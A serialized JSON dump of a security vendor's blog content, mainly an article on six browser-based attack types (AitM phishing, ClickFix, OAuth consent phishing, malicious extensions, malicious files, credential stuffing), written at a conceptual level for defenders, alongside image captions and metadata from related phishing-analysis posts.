form.",{"url":59991,"width":5358,"height":23887},"https://images.ctfassets.net/y1cdw1ablpvd/158qPiOxWO64VKlQsAVMKF/96feda4fbbc8b20ef8cbbc19153095f1/image7.png",{"sys":59993,"__typename":5345,"title":59994,"caption":59995,"layoutMode":118,"file":59996},{"id":49918},"Example of the pop-up window on Windows/Edge and MacOS/Safari","Example of the pop-up window on Windows/Edge and MacOS/Safari.",{"url":59997,"width":5358,"height":5400},"https://images.ctfassets.net/y1cdw1ablpvd/CIeVI4aLXOre61PikcCgN/349d191be7c5721367bb91665fc3b714/image8.png",{"sys":59999,"__typename":5345,"title":60000,"caption":60000,"layoutMode":118,"file":60001},{"id":49938},"Push detection timeline showing detections for the Sneaky2FA phishing kit identified running on the page.",{"url":60002,"width":60003,"height":60004},"https://images.ctfassets.net/y1cdw1ablpvd/UaCyvSZeLDrmNNRp2plxu/8dfe5904a9091b24cdd357b8aba3b30f/image2.png",1790,1786,{"sys":60006,"__typename":5345,"title":60007,"caption":60007,"layoutMode":118,"file":60008},{"id":49989},"The browser window displays a fake Microsoft login URL instead of the phishing server address.",{"url":60009,"width":5358,"height":60010},"https://images.ctfassets.net/y1cdw1ablpvd/1KPzMygiOL9WdqeAm8Jnse/154477969ce82feb3fdaf6bca5eabb30/image3.png",146,{"sys":60012,"__typename":5345,"title":60013,"caption":60013,"layoutMode":118,"file":60014},{"id":50074},"Redirecting to a benign wikibooks page where conditional loading requirements are not met.",{"url":60015,"width":5358,"height":60016},"https://images.ctfassets.net/y1cdw1ablpvd/3XySY2vdyZGZEZBAEPp06i/1df419fd704ea8c759270de68295e229/image4.png",1294,{"sys":60018,"__typename":15269,"type":15270,"ctaText":49208,"buttonLabel":15277,"buttonColour":15273,"buttonUrl":49143},{"id":8590},{"sys":60020,"__typename":5345,"title":60021,"caption":60021,"layoutMode":118,"file":60022},{"id":50217},"Raccoon0365 screenshot with BITB.",{"url":60023,"width":11967,"height":11942},"https://images.ctfassets.net/y1cdw1ablpvd/4YR0b1ymDOSeXjeFJa2Ibs/7a3e673c4668c865e557038d98523513/image1.png","content:blog:analyzing-the-latest-sneaky2fa-phishing-page.json","blog/analyzing-the-latest-sneaky2fa-phishing-page.json","blog/analyzing-the-latest-sneaky2fa-phishing-page",{"_path":60028,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":60029,"ogImage":118,"summary":60031,"title":1480,"subtitle":118,"metaTitle":60042,"synopsis":1481,"hashTags":118,"publishedDate":1482,"slug":1483,"tagsCollection":60043,"relatedBlogPostsCollection":60049,"authorsCollection":61768,"content":61772,"_id":62757,"_type":5439,"_source":5440,"_file":62758,"_stem":62759,"_extension":5439},"/blog/scattered-lapsus-hunters",{"id":519,"publishedAt":60030},"2026-03-25T11:16:23.439Z",{"json":60032},{"data":60033,"content":60034,"nodeType":165},{},[60035],{"data":60036,"content":60037,"nodeType":178},{},[60038],{"data":60039,"marks":60040,"value":60041,"nodeType":173},{},[],"In this blog post, we’ll be taking a closer look at the breaches linked to Scattered Lapsus$ Hunters, the evolution of TTPs that makes them so successful, and how they’re shaping the current and next generation of cyber criminals.","Analyzing \"Scattered Lapsus$ Hunters\" breaches since 2021",{"items":60044},[60045,60047],{"sys":60046,"name":505},{"id":504},{"sys":60048,"name":509},{"id":508},{"items":60050},[60051,60704,61096],{"__typename":1528,"sys":60052,"content":60054,"title":60690,"synopsis":60691,"hashTags":118,"publishedDate":60692,"slug":60693,"tagsCollection":60694,"authorsCollection":60700},{"id":60053},"62Zyr35VUmijkpupWk3hoD",{"json":60055},{"data":60056,"content":60057,"nodeType":165},{},[60058,60074,60081,60084,60092,60099,60106,60125,60131,60138,60145,60152,60159,60162,60170,60177,60182,60189,60197,60204,60211,60217,60236,60242,60249,60255,60262,60268,60271,60279,60295,60302,60332,60339,60346,60352,60359,60366,60373,60376,60384,60400,60406,60413,60420,60426,60433,60440,60443,60451,60458,60478,60522,60529,60536,60543,60546,60554,60561,60568,60575,60578,60586,60593,60623,60643,60650,60653,60660,60667,60673],{"data":60059,"content":60060,"nodeType":178},{},[60061,60065,60070],{"data":60062,"marks":60063,"value":60064,"nodeType":173},{},[],"The view that \"the browser is the new endpoint\" and \"the new battleground for cyber attacks\" is becoming increasingly advocated by security leaders. But what does this ",{"data":60066,"marks":60067,"value":60069,"nodeType":173},{},[60068],{"type":1646},"actually",{"data":60071,"marks":60072,"value":60073,"nodeType":173},{},[]," mean for security teams? ",{"data":60075,"content":60076,"nodeType":178},{},[60077],{"data":60078,"marks":60079,"value":60080,"nodeType":173},{},[],"In this article, we’re cutting out the jargon to explore what a browser-based attack is, and what’s required for effective detection and response. ",{"data":60082,"content":60083,"nodeType":231},{},[],{"data":60085,"content":60086,"nodeType":169},{},[60087],{"data":60088,"marks":60089,"value":60091,"nodeType":173},{},[60090],{"type":370},"What is the goal of a browser-based attack?   ",{"data":60093,"content":60094,"nodeType":178},{},[60095],{"data":60096,"marks":60097,"value":60098,"nodeType":173},{},[],"First, it’s important to establish what the point of a browser-based attack is.",{"data":60100,"content":60101,"nodeType":178},{},[60102],{"data":60103,"marks":60104,"value":60105,"nodeType":173},{},[],"In most scenarios, attackers don’t think of themselves as attacking your web browser. Their end-goal is to compromise your business apps and data. That means going after the third-party apps and services that are now the backbone of business IT — and therefore the top target for attackers. ",{"data":60107,"content":60108,"nodeType":178},{},[60109,60113,60121],{"data":60110,"marks":60111,"value":60112,"nodeType":173},{},[],"The most common attack path today sees attackers log into third-party services, dump the data, and monetize it through extortion. You need only look at last year’s ",{"data":60114,"content":60116,"nodeType":186},{"uri":60115},"https://pushsecurity.com/blog/snowflake-retro?utm_source=bleeping-computer&utm_medium=sponsored-content&utm_term=article",[60117],{"data":60118,"marks":60119,"value":27706,"nodeType":173},{},[60120],{"type":194},{"data":60122,"marks":60123,"value":60124,"nodeType":173},{},[]," customer breaches or the still-ongoing Salesforce attacks to see the impact.",{"data":60126,"content":60130,"nodeType":312},{"target":60127},{"sys":60128},{"id":60129,"type":317,"linkType":318},"5agrVXzEdwALmew2F5SPDp",[],{"data":60132,"content":60133,"nodeType":178},{},[60134],{"data":60135,"marks":60136,"value":60137,"nodeType":173},{},[],"The most logical way to do this is by targeting users of those apps. And because of the changes to working practices, your users are more accessible than ever to external attackers.",{"data":60139,"content":60140,"nodeType":178},{},[60141],{"data":60142,"marks":60143,"value":60144,"nodeType":173},{},[],"Once upon a time, email was the primary communication channel with the wider world, and work happened locally — on your device, and inside your locked-down network environment. This made email and the endpoint the highest priority from a security perspective. But now, with modern work happening across a network of decentralized internet apps, and more varied communication channels outside of email, it’s harder to stop users from interacting with malicious content (at least, without significantly impeding their ability to do their jobs).",{"data":60146,"content":60147,"nodeType":178},{},[60148],{"data":60149,"marks":60150,"value":60151,"nodeType":173},{},[],"Given that the browser is the place where business apps are accessed and used, it makes sense that attacks are increasingly playing out there too. ",{"data":60153,"content":60154,"nodeType":178},{},[60155],{"data":60156,"marks":60157,"value":60158,"nodeType":173},{},[],"With that covered off, let’s take a closer look at the most prevalent browser-based attack techniques being used by attackers in the wild today.",{"data":60160,"content":60161,"nodeType":231},{},[],{"data":60163,"content":60164,"nodeType":169},{},[60165],{"data":60166,"marks":60167,"value":60169,"nodeType":173},{},[60168],{"type":370},"The 6 key browser-based attacks that security teams need to know about",{"data":60171,"content":60172,"nodeType":178},{},[60173],{"data":60174,"marks":60175,"value":60176,"nodeType":173},{},[],"Attacks that target users in their web browsers have seen an unprecedented rise in recent years. ",{"data":60178,"content":60181,"nodeType":312},{"target":60179},{"sys":60180},{"id":27196,"type":317,"linkType":318},[],{"data":60183,"content":60184,"nodeType":178},{},[60185],{"data":60186,"marks":60187,"value":60188,"nodeType":173},{},[],"Here's our breakdown of the top 6 browser-based attacks that should be on every security team's radar right now. ",{"data":60190,"content":60191,"nodeType":235},{},[60192],{"data":60193,"marks":60194,"value":60196,"nodeType":173},{},[60195],{"type":370},"1. Phishing for credentials and sessions",{"data":60198,"content":60199,"nodeType":178},{},[60200],{"data":60201,"marks":60202,"value":60203,"nodeType":173},{},[],"The most direct way for an attacker to compromise a business application is to phish a user of that app. You might not necessarily think of phishing as a browser-based attack, but that’s exactly what it is today. ",{"data":60205,"content":60206,"nodeType":178},{},[60207],{"data":60208,"marks":60209,"value":60210,"nodeType":173},{},[],"Phishing tooling and infrastructure has evolved a lot in the past decade, while the changes to business IT means there are both many more vectors for phishing attack delivery, and apps and identities to target. Attackers can deliver links over instant messenger apps, social media, SMS, malicious ads, and using in-app messenger functionality, as well as sending emails directly from SaaS services to bypass email-based checks. Likewise, there are now hundreds of apps per enterprise to target, with varying levels of account security configuration. ",{"data":60212,"content":60216,"nodeType":312},{"target":60213},{"sys":60214},{"id":60215,"type":317,"linkType":318},"3SrKOgpedLMQRpKIZqUQur",[],{"data":60218,"content":60219,"nodeType":178},{},[60220,60224,60232],{"data":60221,"marks":60222,"value":60223,"nodeType":173},{},[],"Whereas phishing was once entirely focused on credential theft, modern phishing attacks see the attacker intercept the victim’s session on the target app, using reverse-proxy Attacker-in-the-Middle kits that are the standard choice for attackers today. This means most forms of MFA can be bypassed, with the exception of passkeys (though attackers are finding ways to work around passkeys using ",{"data":60225,"content":60227,"nodeType":186},{"uri":60226},"https://pushsecurity.com/blog/mfa-downgrade-attacks/?utm_source=bleeping-computer&utm_medium=sponsored-content&utm_term=article",[60228],{"data":60229,"marks":60230,"value":39789,"nodeType":173},{},[60231],{"type":194},{"data":60233,"marks":60234,"value":60235,"nodeType":173},{},[],"). ",{"data":60237,"content":60241,"nodeType":312},{"target":60238},{"sys":60239},{"id":60240,"type":317,"linkType":318},"2sOFEdAwQZjWOGzNAlGavb",[],{"data":60243,"content":60244,"nodeType":178},{},[60245],{"data":60246,"marks":60247,"value":60248,"nodeType":173},{},[],"There are other key differences to be aware of too. Today, phishing operates on an industrial scale, using an array of obfuscation and detection evasion techniques. The latest generation of fully customized AitM phishing kits are dynamically obfuscating the code that loads the web page, implementing custom bot protection (e.g. CAPTCHA or Cloudflare Turnstile), using runtime anti-analysis features, and using legitimate SaaS and cloud services to host and deliver phishing links to cover their tracks.",{"data":60250,"content":60251,"nodeType":178},{},[60252],{"data":60253,"marks":60254,"value":21384,"nodeType":173},{},[],{"data":60256,"content":60257,"nodeType":178},{},[60258],{"data":60259,"marks":60260,"value":60261,"nodeType":173},{},[],"These changes make phishing more effective than ever, and increasingly difficult to detect and block without being able to observe and analyze web pages that a user interacts with in real time — something only possible with browser-level visibility. ",{"data":60263,"content":60267,"nodeType":312},{"target":60264},{"sys":60265},{"id":60266,"type":317,"linkType":318},"1II2kHyOZcShLsexx1TAgy",[],{"data":60269,"content":60270,"nodeType":231},{},[],{"data":60272,"content":60273,"nodeType":235},{},[60274],{"data":60275,"marks":60276,"value":60278,"nodeType":173},{},[60277],{"type":370},"2. Malicious copy and paste (aka. ClickFix, FileFix, etc.)",{"data":60280,"content":60281,"nodeType":178},{},[60282,60285,60292],{"data":60283,"marks":60284,"value":21114,"nodeType":173},{},[],{"data":60286,"content":60287,"nodeType":186},{"uri":21119},[60288],{"data":60289,"marks":60290,"value":1845,"nodeType":173},{},[60291],{"type":194},{"data":60293,"marks":60294,"value":197,"nodeType":173},{},[],{"data":60296,"content":60297,"nodeType":178},{},[60298],{"data":60299,"marks":60300,"value":60301,"nodeType":173},{},[],"Originally known as “Fake CAPTCHA”, these attacks attempt to trick users into running malicious commands on their device — typically by solving some form of verification challenge in the browser. ",{"data":60303,"content":60304,"nodeType":178},{},[60305,60309,60316,60320,60329],{"data":60306,"marks":60307,"value":60308,"nodeType":173},{},[],"In reality, by solving the challenge, the victim is actually copying malicious code from the page clipboard and running it on their device. It typically gives the victim instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Terminal, or PowerShell. Variants such as ",{"data":60310,"content":60311,"nodeType":186},{"uri":21280},[60312],{"data":60313,"marks":60314,"value":21283,"nodeType":173},{},[60315],{"type":194},{"data":60317,"marks":60318,"value":60319,"nodeType":173},{},[]," have also emerged which instead uses the File Explorer Address Bar to execute OS commands, while recent examples have seen this attack branch out to ",{"data":60321,"content":60323,"nodeType":186},{"uri":60322},"https://www.bleepingcomputer.com/news/security/fake-mac-fixes-trick-users-into-installing-new-shamos-infostealer/",[60324],{"data":60325,"marks":60326,"value":60328,"nodeType":173},{},[60327],{"type":194},"Mac via the macOS terminal",{"data":60330,"marks":60331,"value":1477,"nodeType":173},{},[],{"data":60333,"content":60334,"nodeType":178},{},[60335],{"data":60336,"marks":60337,"value":60338,"nodeType":173},{},[],"Most commonly, these attacks are used to deliver infostealer malware, using stolen session cookies and credentials to access business apps and services. ",{"data":60340,"content":60341,"nodeType":178},{},[60342],{"data":60343,"marks":60344,"value":60345,"nodeType":173},{},[],"Like modern credential and session phishing, links to malicious pages are distributed over various delivery channels and using a variety of lures, including impersonating CAPTCHA, Cloudflare Turnstile, simulating an error loading a webpage, and many more. ",{"data":60347,"content":60351,"nodeType":312},{"target":60348},{"sys":60349},{"id":60350,"type":317,"linkType":318},"6O9YiOfhpGFCDsTil9F3On",[],{"data":60353,"content":60354,"nodeType":178},{},[60355],{"data":60356,"marks":60357,"value":60358,"nodeType":173},{},[],"The variance in lure, and differences between different versions of the same lure, can make it difficult to fingerprint and detect based on visual elements alone. Also, many of the same protections being used to obfuscate and prevent analysis of phishing pages also apply to ClickFix pages, making it equally challenging to detect and block them. ",{"data":60360,"content":60361,"nodeType":178},{},[60362],{"data":60363,"marks":60364,"value":60365,"nodeType":173},{},[],"This leaves most of the detection and blocking down to endpoint-layer controls around user-level code execution and malware running on a device. The quantity of ClickFix-related headlines in the news would indicate that endpoint controls are being routinely bypassed, or perhaps evaded altogether by targeting personal or BYOD devices. ",{"data":60367,"content":60368,"nodeType":178},{},[60369],{"data":60370,"marks":60371,"value":60372,"nodeType":173},{},[],"There is a significant opportunity to detect these attacks in the browser and stop them at the earliest opportunity, before they reach the endpoint. Every ClickFix attack and variant has a key action in common — malicious code is copied from the page’s clipboard. In some cases, this happens without any user interaction (where the only requirement on the user is to run code that has been silently copied behind the scenes), presenting a strong indicator of malicious behavior that can be observed in the browser. ",{"data":60374,"content":60375,"nodeType":231},{},[],{"data":60377,"content":60378,"nodeType":235},{},[60379],{"data":60380,"marks":60381,"value":60383,"nodeType":173},{},[60382],{"type":370},"3. Malicious OAuth integrations",{"data":60385,"content":60386,"nodeType":178},{},[60387,60391,60397],{"data":60388,"marks":60389,"value":60390,"nodeType":173},{},[],"Malicious OAuth integrations are another way for attackers to compromise an app by tricking a user into authorizing an integration with a malicious, attacker-controlled app, with the level of data access and functionality dictated by the scopes authorized in the request. This is also known as ",{"data":60392,"content":60393,"nodeType":186},{"uri":19838},[60394],{"data":60395,"marks":60396,"value":8091,"nodeType":173},{},[],{"data":60398,"marks":60399,"value":2340,"nodeType":173},{},[],{"data":60401,"content":60405,"nodeType":312},{"target":60402},{"sys":60403},{"id":60404,"type":317,"linkType":318},"5JaP4WSfFsFSbvaa9BQBOq",[],{"data":60407,"content":60408,"nodeType":178},{},[60409],{"data":60410,"marks":60411,"value":60412,"nodeType":173},{},[],"This is an effective way for attackers to bypass hardened authentication and access controls by sidestepping the typical login process to take over an account and compromise business apps. This includes phishing-resistant MFA methods like passkeys — since the standard login process does not apply. ",{"data":60414,"content":60415,"nodeType":178},{},[60416],{"data":60417,"marks":60418,"value":60419,"nodeType":173},{},[],"A variant of this attack has dominated the headlines recently with the ongoing Salesforce breaches. In this scenario, the attacker tricked the victim into authorizing an attacker-controlled OAuth app via the device code authorization flow in Salesforce, which requires the user to enter an 8-digit code in place of a password or MFA factor.",{"data":60421,"content":60425,"nodeType":312},{"target":60422},{"sys":60423},{"id":60424,"type":317,"linkType":318},"3odEFcUcpKN553gHh2P5yr",[],{"data":60427,"content":60428,"nodeType":178},{},[60429],{"data":60430,"marks":60431,"value":60432,"nodeType":173},{},[],"Preventing malicious OAuth grants being authorized requires tight in-app management of user permissions and tenant security settings. This is no mean feat when considering the 100s of apps in use across the modern enterprise, many of which are not centrally managed by IT and security teams (or in some cases, are completely unknown to them). Even then, you’re limited by the controls made available by the app vendor. In this case, Salesforce has announced planned changes to OAuth app authorization in order to improve security prompted by these attacks — but many more apps with insecure configs exist for attackers to take advantage of in future. ",{"data":60434,"content":60435,"nodeType":178},{},[60436],{"data":60437,"marks":60438,"value":60439,"nodeType":173},{},[],"However, unlike app-specific integrations, browser-based security tools are well positioned to observe OAuth grants across all apps accessed in the browser — even the ones the security team doesn’t manage or know about, or without needing to pay for the app’s special security add-on to get visibility.",{"data":60441,"content":60442,"nodeType":231},{},[],{"data":60444,"content":60445,"nodeType":235},{},[60446],{"data":60447,"marks":60448,"value":60450,"nodeType":173},{},[60449],{"type":370},"4. Malicious browser extensions",{"data":60452,"content":60453,"nodeType":178},{},[60454],{"data":60455,"marks":60456,"value":60457,"nodeType":173},{},[],"Malicious browser extensions are another way for attackers to compromise your business apps by observing and capturing logins as they happen, and/or extracting session cookies and credentials saved in the browser cache and password manager. ",{"data":60459,"content":60460,"nodeType":178},{},[60461,60465,60474],{"data":60462,"marks":60463,"value":60464,"nodeType":173},{},[],"Attackers do this by creating their own malicious extension and tricking your users into installing it, or taking over an existing extension to gain access to browsers where it is already installed (",{"data":60466,"content":60468,"nodeType":186},{"uri":60467},"https://secureannex.com/blog/buying-browser-extensions/",[60469],{"data":60470,"marks":60471,"value":60473,"nodeType":173},{},[60472],{"type":194},"it’s very easy for attackers to buy and add malicious updates to existing extensions",{"data":60475,"marks":60476,"value":60477,"nodeType":173},{},[],", easily passing extension web store security checks). ",{"data":60479,"content":60480,"nodeType":178},{},[60481,60485,60494,60498,60507,60510,60519],{"data":60482,"marks":60483,"value":60484,"nodeType":173},{},[],"The news around extension-based compromises has been on the rise since the ",{"data":60486,"content":60488,"nodeType":186},{"uri":60487},"https://www.bleepingcomputer.com/news/security/new-details-reveal-how-hackers-hijacked-35-google-chrome-extensions/",[60489],{"data":60490,"marks":60491,"value":60493,"nodeType":173},{},[60492],{"type":194},"Cyberhaven extension",{"data":60495,"marks":60496,"value":60497,"nodeType":173},{},[]," was hacked in December 2024, along with at least 35 other extensions. Since then, there has been regular reporting on data-stealing extensions ",{"data":60499,"content":60501,"nodeType":186},{"uri":60500},"https://www.bleepingcomputer.com/news/security/data-stealing-chrome-extensions-impersonate-fortinet-youtube-vpns/",[60502],{"data":60503,"marks":60504,"value":60506,"nodeType":173},{},[60505],{"type":194},"impersonating legitimate brands",{"data":60508,"marks":60509,"value":9534,"nodeType":173},{},[],{"data":60511,"content":60513,"nodeType":186},{"uri":60512},"https://www.bleepingcomputer.com/news/security/chrome-extensions-with-6-million-installs-have-hidden-tracking-code/",[60514],{"data":60515,"marks":60516,"value":60518,"nodeType":173},{},[60517],{"type":194},"impacting millions of users",{"data":60520,"marks":60521,"value":1477,"nodeType":173},{},[],{"data":60523,"content":60524,"nodeType":178},{},[60525],{"data":60526,"marks":60527,"value":60528,"nodeType":173},{},[],"Risky browser extension permissions include broad data access, the ability to modify website content, track user activity, capture screenshots, and manage tabs or network requests. Permissions like \"read and change all data on all websites\" or access to cookies and browsing history are particularly dangerous as they can be exploited for session hijacking, data theft, malware injection, or phishing.",{"data":60530,"content":60531,"nodeType":178},{},[60532],{"data":60533,"marks":60534,"value":60535,"nodeType":173},{},[],"Generally, your employees should not be randomly installing browser extensions unless pre-approved by your security team. The reality, however, is that many organizations have very little visibility of the extensions their employees are using, and the potential risk they’re exposed to as a result. ",{"data":60537,"content":60538,"nodeType":178},{},[60539],{"data":60540,"marks":60541,"value":60542,"nodeType":173},{},[],"To tackle malicious extensions, security tools operating in the browser can track the browser extensions deployed, highlight risky permissions, compare with known-malicious extensions, identify fraudulent/unofficial versions of a legitimate extension, and highlight other risky properties commonly associated with malicious extensions (e.g. “Developer” extensions). ",{"data":60544,"content":60545,"nodeType":231},{},[],{"data":60547,"content":60548,"nodeType":235},{},[60549],{"data":60550,"marks":60551,"value":60553,"nodeType":173},{},[60552],{"type":370},"5. Malicious file delivery",{"data":60555,"content":60556,"nodeType":178},{},[60557],{"data":60558,"marks":60559,"value":60560,"nodeType":173},{},[],"Malicious files have been a core part of malware delivery and credential theft for many years. Just as non-email channels like malvertising and drive-by attacks are used to deliver phishing and ClickFix lures, malicious files are also distributed through similar means — leaving malicious file detection to basic known-bad checks, sandbox analysis using a proxy (not that useful in the context of sandbox-aware malware) or runtime analysis on the endpoint. ",{"data":60562,"content":60563,"nodeType":178},{},[60564],{"data":60565,"marks":60566,"value":60567,"nodeType":173},{},[],"This doesn’t just have to be malicious executables directly dropping malware onto the device. File downloads can also contain additional links taking the user to malicious content. In fact, one of the most common types of downloadable content are HTML Applications (HTAs), commonly used to spawn local phishing pages to stealthily capture credentials. More recently, attackers have been weaponizing SVG files for a similar purpose, running as self-contained phishing pages that render fake login portals entirely client-side. ",{"data":60569,"content":60570,"nodeType":178},{},[60571],{"data":60572,"marks":60573,"value":60574,"nodeType":173},{},[],"Even if malicious content cannot always be flagged from surface-level inspection of a file, recording file downloads in the browser is a useful addition to endpoint-based malware protection, and provides another layer of defense against file downloads that perform client-side attacks, or redirect the user to malicious web-based content. ",{"data":60576,"content":60577,"nodeType":231},{},[],{"data":60579,"content":60580,"nodeType":235},{},[60581],{"data":60582,"marks":60583,"value":60585,"nodeType":173},{},[60584],{"type":370},"6. Stolen credentials and MFA gaps",{"data":60587,"content":60588,"nodeType":178},{},[60589],{"data":60590,"marks":60591,"value":60592,"nodeType":173},{},[],"This last one isn’t so much a browser-based attack, but it is a product of them. When credentials are stolen through phishing or infostealer malware they can be used to take over accounts missing MFA. ",{"data":60594,"content":60595,"nodeType":178},{},[60596,60600,60607,60611,60619],{"data":60597,"marks":60598,"value":60599,"nodeType":173},{},[],"This isn’t the most sophisticated attack, but it’s very effective. You need only look at last year’s ",{"data":60601,"content":60602,"nodeType":186},{"uri":60115},[60603],{"data":60604,"marks":60605,"value":27706,"nodeType":173},{},[60606],{"type":194},{"data":60608,"marks":60609,"value":60610,"nodeType":173},{},[]," account compromises or the ",{"data":60612,"content":60614,"nodeType":186},{"uri":60613},"https://pushsecurity.com/blog/why-attackers-are-targeting-jira-with-stolen-credentials?utm_source=bleeping-computer&utm_medium=sponsored-content&utm_term=article",[60615],{"data":60616,"marks":60617,"value":27729,"nodeType":173},{},[60618],{"type":194},{"data":60620,"marks":60621,"value":60622,"nodeType":173},{},[]," attacks earlier this year to see how attackers harness stolen credentials at scale. ",{"data":60624,"content":60625,"nodeType":178},{},[60626,60630,60639],{"data":60627,"marks":60628,"value":60629,"nodeType":173},{},[],"With the modern enterprise using hundreds of apps, the likelihood that an app hasn’t been configured for mandatory MFA (if possible) is high. And even when an app has been configured for SSO and connected to your primary corporate identity, ",{"data":60631,"content":60633,"nodeType":186},{"uri":60632},"https://pushsecurity.com/blog/how-many-vulnerable-identities-do-you-have/?utm_source=bleeping-computer&utm_medium=sponsored-content&utm_term=sidebar",[60634],{"data":60635,"marks":60636,"value":60638,"nodeType":173},{},[60637],{"type":194},"local “ghost logins” can continue to exist",{"data":60640,"marks":60641,"value":60642,"nodeType":173},{},[],", accepting passwords with no MFA required. Just having visibility of your primary Identity Provider accounts (e.g. Google, Microsoft, Okta) and SSO-connected apps doesn't give you a full picture of your identity surface.",{"data":60644,"content":60645,"nodeType":178},{},[60646],{"data":60647,"marks":60648,"value":60649,"nodeType":173},{},[],"Logins can also be observed in the browser — in fact, it’s as close to a universal source of truth as you’re going to get about how your employees are actually logging in, which apps they’re using, and whether MFA is present, enabling security teams to find and fix vulnerable logins before they can be exploited by attackers. ",{"data":60651,"content":60652,"nodeType":231},{},[],{"data":60654,"content":60655,"nodeType":169},{},[60656],{"data":60657,"marks":60658,"value":40632,"nodeType":173},{},[60659],{"type":370},{"data":60661,"content":60662,"nodeType":178},{},[60663],{"data":60664,"marks":60665,"value":60666,"nodeType":173},{},[],"Attacks are increasingly happening in the browser. That makes it the perfect place to detect and respond to these attacks. But right now, the browser is a blind-spot for most security teams. ",{"data":60668,"content":60669,"nodeType":178},{},[60670],{"data":60671,"marks":60672,"value":27202,"nodeType":173},{},[],{"data":60674,"content":60675,"nodeType":178},{},[60676,60679,60687],{"data":60677,"marks":60678,"value":59468,"nodeType":173},{},[],{"data":60680,"content":60682,"nodeType":186},{"uri":60681},"https://pushsecurity.com/demo?utm_source=bleeping-computer&utm_medium=sponsored-content&utm_term=article",[60683],{"data":60684,"marks":60685,"value":1472,"nodeType":173},{},[60686],{"type":194},{"data":60688,"marks":60689,"value":1477,"nodeType":173},{},[],"6 browser-based attacks every security team should be prepared for","What security teams need to know about the browser-based attack techniques that are the leading cause of breaches.","2025-09-05T00:00:00.000Z","6-browser-based-attacks-every-security-team-should-be-prepared-for",{"items":60695},[60696,60698],{"sys":60697,"name":505},{"id":504},{"sys":60699,"name":509},{"id":508},{"items":60701},[60702],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":60703},{"url":1496},{"__typename":1528,"sys":60705,"content":60706,"title":58422,"synopsis":58423,"hashTags":118,"publishedDate":58424,"slug":58425,"tagsCollection":61086,"authorsCollection":61092},{"id":57991},{"json":60707},{"nodeType":165,"data":60708,"content":60709},{},[60710,60726,60739,60744,60750,60756,60759,60766,60781,60787,60792,60798,60803,60809,60814,60820,60825,60831,60836,60839,60846,60862,60867,60874,60890,60897,60923,60929,60936,60952,60959,60975,60980,60983,60990,61006,61012,61017,61020,61027,61043,61049,61055,61060],{"nodeType":178,"data":60711,"content":60712},{},[60713,60716,60723],{"nodeType":173,"value":58000,"marks":60714,"data":60715},[],{},{"nodeType":186,"data":60717,"content":60718},{"uri":6820},[60719],{"nodeType":173,"value":8157,"marks":60720,"data":60722},[60721],{"type":194},{},{"nodeType":173,"value":197,"marks":60724,"data":60725},[],{},{"nodeType":178,"data":60727,"content":60728},{},[60729,60732,60736],{"nodeType":173,"value":58017,"marks":60730,"data":60731},[],{},{"nodeType":173,"value":58021,"marks":60733,"data":60735},[60734],{"type":370},{},{"nodeType":173,"value":58026,"marks":60737,"data":60738},[],{},{"nodeType":312,"data":60740,"content":60743},{"target":60741},{"sys":60742},{"id":58033,"type":317,"linkType":318},[],{"nodeType":178,"data":60745,"content":60746},{},[60747],{"nodeType":173,"value":58039,"marks":60748,"data":60749},[],{},{"nodeType":178,"data":60751,"content":60752},{},[60753],{"nodeType":173,"value":58046,"marks":60754,"data":60755},[],{},{"nodeType":231,"data":60757,"content":60758},{},[],{"nodeType":169,"data":60760,"content":60761},{},[60762],{"nodeType":173,"value":58056,"marks":60763,"data":60765},[60764],{"type":370},{},{"nodeType":178,"data":60767,"content":60768},{},[60769,60772,60778],{"nodeType":173,"value":58064,"marks":60770,"data":60771},[],{},{"nodeType":186,"data":60773,"content":60774},{"uri":58069},[60775],{"nodeType":173,"value":58072,"marks":60776,"data":60777},[],{},{"nodeType":173,"value":3107,"marks":60779,"data":60780},[],{},{"nodeType":178,"data":60782,"content":60783},{},[60784],{"nodeType":173,"value":58082,"marks":60785,"data":60786},[],{},{"nodeType":312,"data":60788,"content":60791},{"target":60789},{"sys":60790},{"id":58089,"type":317,"linkType":318},[],{"nodeType":178,"data":60793,"content":60794},{},[60795],{"nodeType":173,"value":58095,"marks":60796,"data":60797},[],{},{"nodeType":312,"data":60799,"content":60802},{"target":60800},{"sys":60801},{"id":58102,"type":317,"linkType":318},[],{"nodeType":178,"data":60804,"content":60805},{},[60806],{"nodeType":173,"value":58108,"marks":60807,"data":60808},[],{},{"nodeType":312,"data":60810,"content":60813},{"target":60811},{"sys":60812},{"id":58115,"type":317,"linkType":318},[],{"nodeType":178,"data":60815,"content":60816},{},[60817],{"nodeType":173,"value":58121,"marks":60818,"data":60819},[],{},{"nodeType":312,"data":60821,"content":60824},{"target":60822},{"sys":60823},{"id":58128,"type":317,"linkType":318},[],{"nodeType":178,"data":60826,"content":60827},{},[60828],{"nodeType":173,"value":58134,"marks":60829,"data":60830},[],{},{"nodeType":312,"data":60832,"content":60835},{"target":60833},{"sys":60834},{"id":58141,"type":317,"linkType":318},[],{"nodeType":231,"data":60837,"content":60838},{},[],{"nodeType":169,"data":60840,"content":60841},{},[60842],{"nodeType":173,"value":58150,"marks":60843,"data":60845},[60844],{"type":370},{},{"nodeType":178,"data":60847,"content":60848},{},[60849,60852,60859],{"nodeType":173,"value":58158,"marks":60850,"data":60851},[],{},{"nodeType":186,"data":60853,"content":60854},{"uri":6820},[60855],{"nodeType":173,"value":8157,"marks":60856,"data":60858},[60857],{"type":194},{},{"nodeType":173,"value":58169,"marks":60860,"data":60861},[],{},{"nodeType":312,"data":60863,"content":60866},{"target":60864},{"sys":60865},{"id":58176,"type":317,"linkType":318},[],{"nodeType":235,"data":60868,"content":60869},{},[60870],{"nodeType":173,"value":58182,"marks":60871,"data":60873},[60872],{"type":370},{},{"nodeType":178,"data":60875,"content":60876},{},[60877,60880,60887],{"nodeType":173,"value":58190,"marks":60878,"data":60879},[],{},{"nodeType":186,"data":60881,"content":60882},{"uri":58195},[60883],{"nodeType":173,"value":58198,"marks":60884,"data":60886},[60885],{"type":194},{},{"nodeType":173,"value":58203,"marks":60888,"data":60889},[],{},{"nodeType":235,"data":60891,"content":60892},{},[60893],{"nodeType":173,"value":58210,"marks":60894,"data":60896},[60895],{"type":370},{},{"nodeType":178,"data":60898,"content":60899},{},[60900,60903,60910,60913,60920],{"nodeType":173,"value":58218,"marks":60901,"data":60902},[],{},{"nodeType":186,"data":60904,"content":60905},{"uri":8419},[60906],{"nodeType":173,"value":58225,"marks":60907,"data":60909},[60908],{"type":194},{},{"nodeType":173,"value":58230,"marks":60911,"data":60912},[],{},{"nodeType":186,